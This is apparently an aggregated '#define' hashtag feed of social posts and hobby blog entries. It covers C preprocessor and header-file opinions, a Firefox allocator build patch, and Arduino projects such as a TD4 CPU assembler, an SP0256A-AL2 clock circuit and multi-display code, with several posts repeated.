makethat’s held together with chewing gum and rubber bands, and probably isn’t even portable. when instead you could literally just include your.c/.cppfiles directly and bypass that whole processand it’s not even hard to write a
.c/.cppfile that doesn’t need a headerfile:// inside of funcs.cpp: #ifndef FUNCS_CPP #define FUNCS_CPP int someFunc(); int someFunc() { return 666; } #endif // and you just import it like this: #include "./funcs.cpp"like why didn’t people figure this out decades ago. who even thought that headerfiles were a good idea. maybe I’m missing something but they genuinely seem to have only downsides and aren’t even the obvious way to solve this problem?
-
CW: C/C++ hot take
as far as I can tell header files have no advantages over just putting your forward declarations at the top of your
.c/.cppfileslike it’s bad enough that you have to declare everything twice, but putting your second declaration in a totally separate file that you have to remember to keep updated? that will definitely bite you in the ass
also the existence of header files requires you to use some arcane rube goldberg build system like
makethat’s held together with chewing gum and rubber bands, and probably isn’t even portable. when instead you could literally just include your.c/.cppfiles directly and bypass that whole processand it’s not even hard to write a
.c/.cppfile that doesn’t need a headerfile:// inside of funcs.cpp: #ifndef FUNCS_CPP #define FUNCS_CPP int someFunc(); int someFunc() { return 666; } #endif // and you just import it like this: #include "./funcs.cpp"like why didn’t people figure this out decades ago. who even thought that headerfiles were a good idea. maybe I’m missing something but they genuinely seem to have only downsides and aren’t even the obvious way to solve this problem?
-
It's live.
https://godbolt.org/z/71f3xxcYh
#include <stdio.h>
#define bar(x) _Generic(x, \
int v: v, \
struct foo v: v.name \
)
struct foo { char* name; };
int main() {
struct foo f = { "test" };
bar(3);
bar(f) = "something";
puts(f.name); // prints "something"
} -
fuck u mozilla
--- memory/build/mozjemalloc.cpp.orig
+++ memory/build/mozjemalloc.cpp
@@ -5257,7 +5257,7 @@ static void replace_malloc_init_funcs(malloc_table_t* table) {
#endif
#define NOTHROW_MALLOC_DECL(...) \
- MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (noexcept(true), __VA_ARGS__))
+ MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (, __VA_ARGS__))u will not defeat me mozilla
-
fuck u mozilla
--- memory/build/mozjemalloc.cpp.orig
+++ memory/build/mozjemalloc.cpp
@@ -5257,7 +5257,7 @@ static void replace_malloc_init_funcs(malloc_table_t* table) {
#endif
#define NOTHROW_MALLOC_DECL(...) \
- MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (noexcept(true), __VA_ARGS__))
+ MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (, __VA_ARGS__))u will not defeat me mozilla
-
fuck u mozilla
--- memory/build/mozjemalloc.cpp.orig
+++ memory/build/mozjemalloc.cpp
@@ -5257,7 +5257,7 @@ static void replace_malloc_init_funcs(malloc_table_t* table) {
#endif
#define NOTHROW_MALLOC_DECL(...) \
- MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (noexcept(true), __VA_ARGS__))
+ MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (, __VA_ARGS__))u will not defeat me mozilla
-
fuck u mozilla
--- memory/build/mozjemalloc.cpp.orig
+++ memory/build/mozjemalloc.cpp
@@ -5257,7 +5257,7 @@ static void replace_malloc_init_funcs(malloc_table_t* table) {
#endif
#define NOTHROW_MALLOC_DECL(...) \
- MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (noexcept(true), __VA_ARGS__))
+ MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (, __VA_ARGS__))u will not defeat me mozilla
-
fuck u mozilla
--- memory/build/mozjemalloc.cpp.orig
+++ memory/build/mozjemalloc.cpp
@@ -5257,7 +5257,7 @@ static void replace_malloc_init_funcs(malloc_table_t* table) {
#endif
#define NOTHROW_MALLOC_DECL(...) \
- MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (noexcept(true), __VA_ARGS__))
+ MOZ_MEMORY_API MACRO_CALL(GENERIC_MALLOC_DECL, (, __VA_ARGS__))u will not defeat me mozilla
-
@funkylab it’s really to do with it not being standardised more than anything else. Like what is the expectation of preprocessing the following file lol.h
#ifndef foo
#define foo
#else
#pragma once
#endif
#include "lol.h"
YoIs it a single “Yo” or two lines of “Yo”?
If it was defined that it needed to be the first thing in a file following whitespace, I think i’f be fine with it.
-
@funkylab it’s really to do with it not being standardised more than anything else. Like what is the expectation of preprocessing the following file lol.h
#ifndef foo
#define foo
#else
#pragma once
#endif
#include "lol.h"
YoIs it a single “Yo” or two lines of “Yo”?
If it was defined that it needed to be the first thing in a file following whitespace, I think i’f be fine with it.
-
@funkylab it’s really to do with it not being standardised more than anything else. Like what is the expectation of preprocessing the following file lol.h
#ifndef foo
#define foo
#else
#pragma once
#endif
#include "lol.h"
YoIs it a single “Yo” or two lines of “Yo”?
If it was defined that it needed to be the first thing in a file following whitespace, I think i’f be fine with it.
-
@funkylab it’s really to do with it not being standardised more than anything else. Like what is the expectation of preprocessing the following file lol.h
#ifndef foo
#define foo
#else
#pragma once
#endif
#include "lol.h"
YoIs it a single “Yo” or two lines of “Yo”?
If it was defined that it needed to be the first thing in a file following whitespace, I think i’f be fine with it.
-
@funkylab it’s really to do with it not being standardised more than anything else. Like what is the expectation of preprocessing the following file lol.h
#ifndef foo
#define foo
#else
#pragma once
#endif
#include "lol.h"
YoIs it a single “Yo” or two lines of “Yo”?
If it was defined that it needed to be the first thing in a file following whitespace, I think i’f be fine with it.
-
Marketing Trends That Will Define 2026 https://visualmodo.com/marketing-trends-that-will-define-2025/ ⭐️💡📣 #Define #Trends #Marketing #Strategies
-
Latest #DesmetC "explorations with machete and torch": the compiler source has numbered constants for each supported C datatype. Normally you'd use enum for this sort of thing, but this codebase used
#defines. The constants were numbered in a strange order, and I wanted to re-sort them in the order of the "usual arithmetic conversions", to simplify some logic. This broke code-gen, emitting illegal instructions. Several hours later, I found that CCHAR=1 and CINT=2 were directly used in hex math determining which x86 opcode to emit. When I renumbered those constants, it caused absurd instructions to be generated. After correcting that problem, we are now back to self-hosting o.k.
I'm hoping this will make it possible to retire a bunch of one-off type promotion logic scattered around the compiler, in favor of a few central functions closely mapping to the C89 standard. -
@tknarr it's c
c23 has a way to mimick visibility, by building with `-Dmylib_private` and having:
```c
#ifndef mylib_private
#define mylib_private [[deprecated("private member")]]
#endif
```
but tbh even without that it's also possible to just say "do not touch any undocumented field, you've been warned" -- it's not like c doesn't already have api constraints that live in documentation (e.g. "this pointer may/may-not be NULL"), the less of those we have the better but one step at a time with improving semantics -
TD4 4-bit DIY CPU – Part 7
Once the idea was floated, in Part 6 of creating an Arduino “direct to ROM” assembler, I had to just do it, so this post is a little diversion from the hardware discussion into how that could work.
- Part 1 – Introduction, Discussion and Analysis
- Part 2 – Building and Hardware
- Part 3 – Programming and Simple Programs
- Part 4 – Some hardware enhancements
- Part 5 – My own PCB version
- Part 6 – Replacing the ROM with a microcontroller
- Part 7 – Creating an Arduino “assembler” for the TD4
Basic Concepts
This relies on using an Arduino as the ROM as described in Part 6, but the Arduino now has the option to change the ROM contents independently of the TD4 itself.
The Arduino sketch will do the following:
- Run the TD4 ROM routine off a timer interrupt so that it is always running and responsive.
- Take input over the Arduino serial port to allow basic control, e.g. list, clear, etc.
- Allow the direct input of assembler instructions, such as MOVE A,B or OUT B and so on.
- Provide a means of selecting which line of the program to change.
The code will thus have a number of key sections:
- The TD4 ROM routine.
- Some kind of serial-port command-line interpreter.
- Handler routines for all the commands.
- An assembler.
- A disassembler.
The TD4 ROM routine has already been fully described in Part 6. The only difference is that the scanning routine will be driven from a 1mS timer using the TimerOne library.
As I want to still support a built-in demo, I now have the concept of ROM being the demo code and RAM being the “live” code to pass onto the TD4. The Arduino will initialise the RAM on startup from the ROM.
As far as the TD4 is concerned of course, this is all still ROM.
Command Line Interpreter
The standard Arduino Serial routines will be used to scan for input via the serial port. It will support a line-oriented input as follows:
bool cmdRunner (void) {
while (Serial.available()) {
char c = Serial.read();
if (c == '\n') {
strcpy(cmdSaved, cmdInput);
cmdIdx = 0;
return true;
}
else if (cmdIdx < CMD_BUFFER-1) {
cmdInput[cmdIdx++] = c;
cmdInput[cmdIdx] = '\0';
}
}
return false;
}This will keep adding any received characters to the cmdInput buffer until a newline is received, at which point the command is saved in cmdSaved and the routine will return true indicating a full line is ready to be processed.
Once a complete line is received, then a processing function will parse it.
Key to the processing of commands is a command table that stores the text to match and the handler function to call on finding a valid command. There is an additional parameter that will be passed into the handler function to allow the same handler function to support several commands. This will be used in the assembler itself later.
struct cmd_t {
char cmd[CMD_BUFFER+1];
hdlr_t pFn;
uint8_t idx;
};
const cmd_t PROGMEM cmdTable[NUM_CMDS] = {
{"H", hdlrHelp, 0},
{"L", hdlrList, 0},
{"G", hdlrGoto, 0},
};The algorithm for parsing commands is as follows:
cmdProcess:
Look for a space or newline
IF found a space THEN
This is the start of the parameter
Look for the command in the command table
IF command found THEN
Call the handler function with the parametersThe implementation is a bit complex, as it uses string pointers and has to chop and parse strings as it goes. It is also detailing with the command table in the Arduino’s PROGMEM which is an additional complication too.
In order to be able to use the same command line interpreter for the input of assembler instructions, I’ve had to simplify the syntax. There are no spaces in opcodes and there has to be a space between the opcode and immediate value if used.
Here are some examples:
IN A -> INA
MOVE A,B -> MOVAB
OUT im -> OUT im
JNC im -> JNC im
ADD A,im -> ADDA imHandler Routines
All handler routines have the following prototype:
typedef void (*hdlr_t)(int idx, char *param);
void hdlrHelp(int idx, char *pParam) {
Serial.print("\nHelp\n----\n");
Serial.println("H: Help");
}The idx parameter is the number in the last field of the command table. pParam will be a pointer to the parameter string for the command (if used).
As we’re dealing with strings all the time, there are a number of helper functions to do things like convert strings to numbers as well as others to print numbers in various formats.
Number formats are assumed to be as follows:
0..9 - decimal digits
0x0..F - hex digits
b0..1 - binary digitsThe code provides the following:
- str2num – the basic string parsing routine to recognise all three number formats as strings.
- printbin – print a number in b0..1 format.
- printhex – print a number in 0x0..F format, allowing for a possible leading zero if required.
- printins – print an instruction in textual format.
- printop – print an instruction in binary and hex opcode format.
- printline – print a line number in a consistent binary and hex format.
The code supports the following commands, so each has its own handler function:
- H – help – show the list of commands.
- L – list – show the disassembly of the whole working memory (RAM).
- G – goto – set the working line number.
- C – clear – reset all working memory (RAM) to zeros.
- R – restore – restore the working memory (RAM) to the pre-build demo code (ROM).
- O – opcodes – list the supported opcodes.
Assembler
As already mentioned, I’m using the same command line interpreter code to create the assembler. To do this, each opcode has an entry in the command table:
const cmd_t PROGMEM cmdTable[NUM_CMDS] = {
// Assembly commands - must be first
{"ADDA", hdlrAsm, 0},
{"MOVAB", hdlrAsm, 1},
{"INA", hdlrAsm, 2},
{"MOVA", hdlrAsm, 3},
{"MOVBA", hdlrAsm, 4},
{"ADDB", hdlrAsm, 5},
{"INB", hdlrAsm, 6},
{"MOVB", hdlrAsm, 7},
{"OUTB", hdlrAsm, 8},
{"OUT2B", hdlrAsm, 9},
{"OUT", hdlrAsm, 10},
{"OUT2", hdlrAsm, 11},
{"JNCB", hdlrAsm, 12},
{"JMPB", hdlrAsm, 13},
{"JNC", hdlrAsm, 14},
{"JMP", hdlrAsm, 15},
// Other commands
{"H", hdlrHelp, 0},
{"L", hdlrList, 0},
{"G", hdlrGoto, 0},
{"C", hdlrClear, 0},
{"R", hdlrRestore, 0},
{"O", hdlrOpcodes, 0},
};The order corresponds to the opcode command value, as does the parameter. As these are at the start of the table, I can assume that the position in the table is the same as the command value. This does mean that I also need to account for the duplicated instructions even if I don’t need to use them.
I’m making the following design decisions:
- There is the concept of a “current line” which can be set with the G (goto) command.
- Entering a valid opcode automatically moves the current line on by 1.
- No line information is entered as part of the opcode.
The main logic of the assembler handler is as follows:
Assembler:
Command value is the provided index parameter
Determine the im value from the provided string parameter
RAM[line] = cmd << 4 + im
Increment current lineDisassembler
Disassembly is really largely a look-up table matching opcode command values to text. This is all hidden away behind the two print routines printins() and printop().
void printins (uint8_t ins) {
uint8_t cmd = ins >> 4;
uint8_t im = ins & 0x0F;
Serial.print(FSH(cmdTable[cmd].cmd));
if (HASIM(cmd)) {
Serial.print(" b");
printbin(im,4);
} else {
Serial.print(" ");
}
}
void printop (uint8_t op) {
uint8_t cmd = op >> 4;
uint8_t im = op & 0x0F;
Serial.print("b");
printbin(cmd,4);
Serial.print(" ");
printbin(im,4);
Serial.print("\t0x");
printhex(op,2);
}The main complexity is pulling the strings out of the command table. I’ve had to include a macro to provide access to the strings from the Arduino’s PROGMEM:
#define FSH(x) ((const __FlashStringHelper *)x)
This feels like a bit of a hack, but apparently this is how it should be done for the kind of thing I need to do!
There is another macro here that needs explaining:
#define HASIM(op) (op==0||op==3||op==5||op==7||op>9)
This is a set of conditions that if true means that the command supports an immediate value. This is used in a few places to know how to parse the commands.
Whilst in principle all commands could use the immediate value, the “official” statement of how they work assumes im=0 in many cases. So, for example, OUT B does not require an immediate value, but if one is provided then OUT B becomes OUT B+im.
I’m not really supporting that with this code at the moment.
Putting it all together
Here is a serial output log of a session using the assembler.
> H
Help
----
H: Help
L: List
G: Goto
C: Clear
R: Restore
O: Opcodes
OpCode
OpCode im
Current line: b0000 [0]
> L
RAM Disassembly
b0000 [0]: JNC b1000b1110 10000xE8
b0001 [1]: JMP b0011b1111 00110xF3
b0010 [2]: OUT b0010b1010 00100xA2
b0011 [3]: ADDB b0001b0101 00010x51
b0100 [4]: OUT b0100b1010 01000xA4
b0101 [5]: ADDA b0001b0000 00010x01
b0110 [6]: OUT b1000b1010 10000xA8
b0111 [7]: ADDB b0001b0101 00010x51
b1000 [8]: OUT b0100b1010 01000xA4
b1001 [9]: ADDA b0001b0000 00010x01
b1010 [A]: OUT b0010b1010 00100xA2
b1011 [B]: ADDB b0001b0101 00010x51
b1100 [C]: JMP b0000b1111 00000xF0
b1101 [D]: ADDA b0000b0000 00000x00
b1110 [E]: ADDA b0000b0000 00000x00
b1111 [F]: ADDA b0000b0000 00000x00
Current line: b0010 [2]
> G 13
Goto line 13
Current line: b1101 [D]
> OUTB
Assemble:
b1101 [D] OUTB b1000 00000x80
Current line: b1110 [E]
> L
RAM Disassembly
b0000 [0]: JNC b1000b1110 10000xE8
b0001 [1]: JMP b0011b1111 00110xF3
b0010 [2]: OUT b0010b1010 00100xA2
b0011 [3]: ADDB b0001b0101 00010x51
b0100 [4]: OUT b0100b1010 01000xA4
b0101 [5]: ADDA b0001b0000 00010x01
b0110 [6]: OUT b1000b1010 10000xA8
b0111 [7]: ADDB b0001b0101 00010x51
b1000 [8]: OUT b0100b1010 01000xA4
b1001 [9]: ADDA b0001b0000 00010x01
b1010 [A]: OUT b0010b1010 00100xA2
b1011 [B]: ADDB b0001b0101 00010x51
b1100 [C]: JMP b0000b1111 00000xF0
b1101 [D]: OUTB b1000 00000x80
b1110 [E]: ADDA b0000b0000 00000x00
b1111 [F]: ADDA b0000b0000 00000x00
Current line: b1110 [E]
> O
Supported OpCodes:
b0000 dataADDA im
b0001 0000MOVAB
b0010 0000INA
b0011 dataMOVA im
b0100 0000MOVBA
b0101 dataADDB im
b0110 0000INB
b0111 dataMOVB im
b1000 0000OUTB
b1001 0000OUT2B
b1010 dataOUT im
b1011 dataOUT2 im
b1100 dataJNCB im
b1101 dataJMPB im
b1110 dataJNC im
b1111 dataJMP im
> C
Clearing RAM ... DoneConclusion
The basics for this actually came together fairly quickly, but I must admit to spending a fair bit of time fiddling about with output formats and refactoring various bits of code to try to give some consistency in terms of when newlines are applied, what is shown in binary, what in hex, and so on.
I can’t guarantee everything has been caught, but I’ve typed in all the code (using the newer, limited syntax) from Part 3 and they all seem to work.
It would be nice to be able to automatically reset the TD4 from the Arduino, but for now, pressing the button when required is fine.
For the most part, unless there is a loop to get caught in, the code will cycle back to the start anyway.
In terms of possible updates and enhancements, there are a few on my mind:
- It would be nice to support the undocumented use of immediate values somehow.
- It might be nice to have a way to save/load the code. It only needs to be a string of 16 2-byte hex codes.
- It might be nice to have several demo programs to choose from.
If I expand the instruction set and architecture, then I’ll have to think again about chunks of this code, but for now, it seems to work pretty well.
Kevin
-
Germany is moving to formally define and track femicide, a critical step in addressing the pervasive issue of gender-based violence, but the initiative has alre... https://news.osna.fm/?p=18634 | #news #define #effort #femicide #genderbased
-
Germany is moving to formally define and track femicide, a critical step in addressing the pervasive issue of gender-based violence, but the initiative has alre... https://news.osna.fm/?p=18634 | #news #define #effort #femicide #genderbased
-
Germany is moving to formally define and track femicide, a critical step in addressing the pervasive issue of gender-based violence, but the initiative has alre... https://news.osna.fm/?p=18634 | #news #define #effort #femicide #genderbased
-
Germany is moving to formally define and track femicide, a critical step in addressing the pervasive issue of gender-based violence, but the initiative has alre... https://news.osna.fm/?p=18634 | #news #define #effort #femicide #genderbased
-
Our efforts, in part, define us
https://weakty.com/posts/efforts/
#HackerNews #Our #efforts #in #part #define #us #efforts #selfimprovement #motivation #personalgrowth #HackerNews
-
Arduino and SP0256A-AL2 – Part 4
Having now tried both an Arduino and Raspberry Pi Pico as programmable clocks for the SP0256A-AL2, this post starts to look at some alternative solutions, starting with a HC4046 phase-locked loop, voltage-controlled oscillator clock.
- Part 1 – Basic introduction and getting started
- Part 2 – Arduino programmable clock
- Part 3 – Using a Raspberry Pi Pico as a programmable clock
- Part 4 – Using a HC4046 PLL as the clock
- Part 5 – Using an I2C SI5351 programmable clock
- Part 6 – Adding MIDI
https://makertube.net/w/8eRTaCvqb3bsmZEJFy94E3
Warning! I strongly recommend using old or second hand equipment for your experiments. I am not responsible for any damage to expensive instruments!
If you are new to microcontrollers, see the Getting Started pages.
Some Ideas
Whilst trawling around the Internet (and remembering a comment from my earlier posts), I found two existing projects where changing the frequency was used as a way to add pitch to the SP0256A-AL2:
- The previously mentioned MIDI Narrator: https://rarewaves.net/products/midi-narrator/
- A great blog post on SP0256A-AL2 pitch control: https://www.polaxis.be/2011/11/sp0256-al2-pitch-control/
Both use a VCO approach. The latter using a LTC6903 programmable oscillator; and the former using a CD4046 PLL device.
The LTC6903 looks like it would be a lot more complicated for me to use (especially being SMT), but I have some DIP 4046 devices already in the parts drawer so that is definitely an option for me.
I’ve also found (and now ordered) some breakout boards based on the SI5351 based programmable clock module. They all seem to follow Adafruit’s lead: https://learn.adafruit.com/adafruit-si5351-clock-generator-breakout/overview
One last thought – use a 555. No really! There are some versions that can go up o 3, 4 or even 5MHz apparently, see: https://en.wikipedia.org/wiki/555_timer_IC#Derivatives Of course having that in any way programmable might be a challenge, but it isn’t out of the question.
4046 VCO/PLL
A voltage-controlled oscillator is just what it sounds like. An oscillator whose frequency is related to the level of a control voltage on its input.
Here is a pinout and functional view of the 4046 from the TI 74HC4046/74HCT4046 datasheet. This provides several phase comparators and a voltage-controlled oscillator to create a phased-locked loop controller.
A key statement is the following:
“The VCO requires one external capacitor C1 (between C1A and C1B) and one external resistor R1 (between R1 and GND) or two external resistors R1 and R2 (between R1 and GND, and R2 and GND). Resistor R1 and capacitor C1 determine the frequency range of the VCO. Resistor R2 enables the VCO to have a frequency offset if required.”
The “application information” section describes the “with offset” operation:
There are a lot of graphs of characteristics in the datasheet for the various combinations of R1, R2 and C1 – these are the “figure 27-32” mentioned above. Actually, to cover all options, there are figures 10 through to 43, but most of those cover other situations.
The criteria for selecting R1, R2 and C are:
- R1 Between 3kΩ and 300kΩ
- R2 Between 3kΩ and 300kΩ
- R1 + R2 Parallel Value > 2.7kΩ
- C1 Greater Than 40pF
For the MIDI Narrator, the values being used are as follows:
- R1 = 1.5K to 2.5K (adjustable)
- R2 = 12K
- C1 = 1nF
Which I believe puts it in the following areas of the performance curves, although they aren’t strictly within the state required ranges…:
So without detailed calculations and measurements, I think this puts the (centre) offset frequency at a low-number of MHz (extrapolating for 12K at 5V) and the Max/Min ratio (R2/R1) at something around 4 to 8.
I believe, from looking at the other charts, that a higher R1 or C value gives a lower frequency. There are graphs for the following with the stated approx frequency ranges at 4.5V:
- 1M5, 100nF: 0 < Freq <100Hz
- 150K, 100nF: 0 < Freq < 1kHz
- 5K6, 100nF: 0 < Freq < 20kHz
- 150K, 50pF: 0 < Freq < 1.5MHz
One last thing to note from figure 32 – it states that a Vin of 0.95 VCC will generate the maximum frequency and 0V for the minimum.
It turns out I have some CD4046 in my parts box, not a HC or HCT 4046. On initial inspection, there doesn’t seem to be a lot of difference that would significantly affects my messing around. Some of the pins (that I’m not using) have different functions:
But as I’m not using those pins, that probably won’t matter. But then on closer inspection, I can see a key difference that definitely will affect my messing about – the operating frequency ranges:
- HC/HCT4096: Up to 18MHz at VCC=5V.
- 4096: Up to 1.4MHz at VDD=10V.
And digging into the detailed spec for the CD4046, when running at 5V the maximum is down to just 0.8MHz typical.
So I could use them to test out some general principles but need a HC/HCT version to really achieve what I’d like to do.
At this point my understanding was starting to struggle, and those graphs weren’t helping much. So I just went ahead and built the version of the circuit from the Rarewaves MIDI Narrator. I really wasn’t having much luck with it as is however, so started fiddling about with different components and an oscilloscope to see if I could make any sense from it.
There is a good article about the basics of a 4046 based VCO-driven PLL oscillator output here: https://hackaday.com/2015/08/07/logic-noise-4046-voltage-controlled-oscillator-part-one/
I was finding that the output wasn’t a particularly clean square wave, and at higher frequencies was pretty much triangular. At this stage I don’t know how much of that is my measuring equipment. I have a scope probe with a 10pF capacitance apparently, so a 10K resistor and 10pF capacitor do create a low-pass filter that significantly rounds off the signal.
But more significantly, the peak to peak voltage was greatly reduced to around 1.5Vpp with a significant BC bias. That wasn’t much use as a clock signal for me – from Part 3 I know the SP0256A-AL2 requires <0.6V for a LOW and >2.5V for a HIGH. Basically scope or on scope the output was pretty unreliable for me.
I’d included the 10K resistor between the 4046 and SPA256A-AL2 as per the circuit for the MIDI narrator. But without that resistor, the clock is much cleaner and has much more useful levels, so I removed it. Later experiments show that a 1K resistor seems to work fine too.
I also found that the suggested 1nF capacitor wasn’t giving me a particularly useful range. In the end, 4.7nF seemed to work well for me. Eventually after testing a range of different resistor values, I went back to 12K and 1.5K + 1K pot from the original circuit. This gives me:
- The frequency range set by a combination of 4.7nF and 12K.
- A frequency offset of between 1K and 2.5K is configurable.
I believe this will pull the frequency offset down slightly from the previous values to something between 100kHz and 600kHz, according to the charts, but it gives me a very useful range between around 1MHz and 5MHz once tuned slightly with the trimpot.
When going through the LM358 the usable voltage range for the VCO seems to be between ~2V and 3V for the 1MHz to 5MHz range. 0V is currently giving me 120kHz, tweaking of the offset resistor (R2 = 12K) helps here – 3K3 makes that around 500kHz, making the useful input voltage now around 1.5V to 3V. The issue is that reducing R2 starts to get to the point where the condition that R1||R2 > 2K7 no longer holds true. But either seems fine for some experimenting for now.
My final circuit used for now is as follows:
The CLK output was plugged directly into the SP0256A-AL2 OSC 1 input, with OSC 2 connected to GND.
The control voltage pot goes through a LM358 which might not be strictly necessary in this case, but helps to at least stabilise the input voltage to the VCO. It might also be useful when I switch to programmatically driving the control voltage from a microcontroller.
The usable clock frequency range is adjusted using the trimpot. Eventually, as mentioned, I settled on a range of around 1MHz to 5MHz. It will go lower, but that isn’t so useful for driving the SP0256A-AL2.
Arduino PWM Voltage Control
To get the Arduino to set the control voltage, requires generating a PWM signal which can be pretty simply done with analogWrite().
The default PWM frequency is around 400kHz without messing about directly with Arduino timers. This will need filtering though, but a simple low-pass filter should easily work here, especially as the frequency won’t be changing very often.
I just went back to the MIDI narrator circuit and could see that a 100K/220nF filter was used. Putting these into a low-pass filter calculator gives a cut-off frequency of just under 8Hz. This generates a pretty smooth output.
There is a balance between the frequency range and offset chosen for the 4046 by the selection of R1, R2 and C, and the voltage range sent out of the Arduino. After a fair bit of messing around, I settled on the following:
- R1 = 3K3
- R2 = 10K
- C = 560pF
Then used analogWrite() with values between 60 and 200 to generate voltages and frequencies as follows:
- analogWrite() value range: 60 to 200
- PWM smoothed voltage range: 1.3V to 3.6V
- LM258 output voltage range: 1.3V to 3.3V
- Clock frequency range: 2.2MHz to 5MHz
Setting up the clock via PWM voltage control is done as follows:
#define SP0_CLOCK 10 // D10
void clockSetup () {
pinMode(SP0_CLOCK, OUTPUT);
analogWrite(SP0_CLOCK, 128); // Approx 2.5V output
}
void setClock (int clock) {
analogWrite(SP0_CLOCK, clock);
}Closing Thoughts
This seems to work really well. The control using a pot isn’t particularly reliable, but that is quite different if generating a control voltage from a microcontroller.
I still need to do some calibrations to work out what voltages create which frequencies and then what pitch of voice reproduction that seems to produce, but that can come later. For now it is enough to know it appears to work albeit in still quite a hand-wavy kind of way.
As an aside, whilst trawling around the Internet for this one I stumbled across the CTS256A-AL2 device. This is a microcontroller (I think it is 8051 based, based on a PIC7041) that performs text to allophone conversion for pairing with a SP0256A-AL2 for a complete text to speech system.
There are some details, and an interesting DIY board, here: https://www.smbaker.com/cts256a-al2-text-to-speech-board and an older project here: https://8051bits.com/misc-projects/speech%20-%20music%20synthesizers/speech-mus-syn.html
Unfortunately these seem very hard to come by these days, but there is some interesting emulation code here: https://github.com/GmEsoft/SP0256_CTS256A-AL2
And a pretty thorough discussion about the device and its running code here: https://www.retrobrewcomputers.org/forum/index.php?t=msg&th=816&goto=10847
Kevin
-
¿Usar un debugger como gdb?
Naa, a mi dejame con los printf metidos por todos lados, y una directiva #define para activarlos o desactivarlos a todos juntos cuando la cosa se complica 😆
-
Arduino with Multiple Displays – Part 3
Whilst messing around a little more with my Arduino with Multiple Displays – Part 2, I’ve optimised the code a little and found out a bit more about these displays!
In this part, I’m actually using a PCB that can hold four displays, powered by a Waveshare Zero device. More on that here: Waveshare Zero Multi Display PCB Design.
Warning! I strongly recommend using old or second hand equipment for your experiments. I am not responsible for any damage to expensive instruments!
These are the key Arduino tutorials for the main concepts used in this project:
- Arduino with Multiple Displays
- https://emalliab.wordpress.com/2025/07/19/small-microcontroller-displays/
If you are new to microcontrollers, see the Getting Started pages.
Parts list
- A Waveshare Zero format board or similar
- 4x 0.96″ ST7735 60×180 SPI TFT displays.
- Built Waveshare Zero Multi Display PCB
- Breadboard and jumper wires.
Recall that I’m using displays that look like this – note the order of the pins.
Although even with displays that look exactly the same, it appears there can be differences in how they are used software wise. More on that later.
The Circuit
For two displays, I can reuse the circuit from Arduino with Multiple Displays – Part 2. For more displays, it is possible to cascade more displays using jumper wires, but I’ve used my PCB.
The pins to be used for various Waveshare Zero boards is covered in part 2.
The Code
Whilst using these displays, I found that the colours can be inverted in some of them compared to others. Typically, I’ve found that I might have to use either of the following two options to drive them correctly:
tft.initR(INITR_MINI160x80);
tft.initR(INITR_MINI160x80_PLUGIN);These represent different Adafruit displays as before, but they generally work for me.
However there is another thing to watch out for. These displays are 16-bit colour displays, which means each colour value is a 16-bit word with red, green and blue elements represented by 5, 6 and 5 bits. This means two of the colours have a resolution of 0 to 31, and one has 0 to 63.
But the ordering seems different for different displays. The default Adafruit library appears to assume RGB ordering, but my displays seem to be BGR. This means that if I use the provided short-cuts for colours, the red and blue elements are swapped.
Consequently, I defined my own colours along with a macro to allow me to provide RGB values and turn it into the device-specific 16-bit value as required.
In the following, I define the bit-shift number for each of red, green and blue and the use that in a macro “ST_COL” shifting the value to the correct place in the 5-6-5 format. Red and blue are the 5-bit colours and green is the 6-bit colour, so in each case I take the most significant bits which means each colour can still be defined in terms of 0..255 RGB values.
// Format is 16-bit 5-6-5 B-G-R
// Allow 0..255 in component values, by only taking
// most significant bits (5 or 6) from each value.
// bbbbbggggggrrrrr
#define ST_COL(r,g,b) (((r&0xF8)>>3)|((g&0xFC)<<3)|((b&0xF8)<<8))
#define ST_BLACK ST_COL(0,0,0)
#define ST_GREY ST_COL(64,64,64)
#define ST_WHITE ST_COL(255,255,255)
#define ST_BLUE ST_COL(0,0,255)
#define ST_GREEN ST_COL(0,255,0)
#define ST_RED ST_COL(255,0,0)
#define ST_YELLOW ST_COL(255,255,0)
#define ST_MAGENTA ST_COL(255,0,255)
#define ST_CYAN ST_COL(0,255,255)I’m also building up to seeing if I can drive more than four displays, so I’ve also changed the code to allow me to iterate across a number of displays.
#define NUM_TFTS 4
int tftTypes[NUM_TFTS] = {
INITR_MINI160x80, INITR_MINI160x80,
INITR_MINI160x80, INITR_MINI160x80,
};
int tftCS[NUM_TFTS] = {SPI_SS, 6, 5, 4};
#define TFT_RST 7
#define TFT_DC 11
Adafruit_ST7735 *tft[NUM_TFTS];
void setup() {
int rstPin = TFT_RST;0
for (int i=0; i<NUM_TFTS; i++) {
tft[i] = new Adafruit_ST7735(&MySPI, tftCS[i], TFT_DC, rstPin);
rstPin = -1;
tft[i]->initR(tftTypes[i]);
tft[i]->setRotation(3);
tft[i]->fillScreen(ST_BLACK);
}
}
void loop() {
for (int i=0; i<NUM_TFTS; i++) {
unsigned long time = millis();
tft[i]->fillRect(10, 20, tft[i]->width(), 20, ST_BLACK);
tft[i]->setTextColor(ST_GREEN);
tft[i]->setCursor(10, 20);
tft[i]->print(i);
tft[i]->print(":");
tft[i]->print(time, DEC);
}
}Each instance of the display code is now created dynamically and stored in an array which can then be iterated over when it comes to putting things on each display.
Notice how the reset pin definition is set to -1 after the first initialisation. This ensures that subsequent instantiations won’t reset displays that have already been set up.
The final code actually allows up to eight displays to be included by setting NUM_TFTS at the top to two or four.
The GPIO usage being assumed is described here: Waveshare Zero Multi Display PCB Build Guide.
Closing Thoughts
Approaching the code in this way allows me to experiment more easily with more than four displays.
If my PCB works as I’m hoping I should be able to cascade them to get eight displays – assuming the Waveshare Zero is up to driving eight of course.
Kevin
#arduinoUno #define #esp32c3 #ESP32s3 #rp2040 #st7735 #tftDisplay #WaveshareZero
-
Arduino and SP0256A-AL2 – Part 2
After getting the Arduino and SP0256A-AL2 working I wondered if I could repeat the trick from the Arduino and AY-3-8910 and have the Arduino generate the required clock signal for the SP0256A-AL2. This post starts to look at that question.
- Part 1 – Basic introduction and getting started
- Part 2 – Arduino programmable clock
- Part 3 – Using a Raspberry Pi Pico as a programmable clock
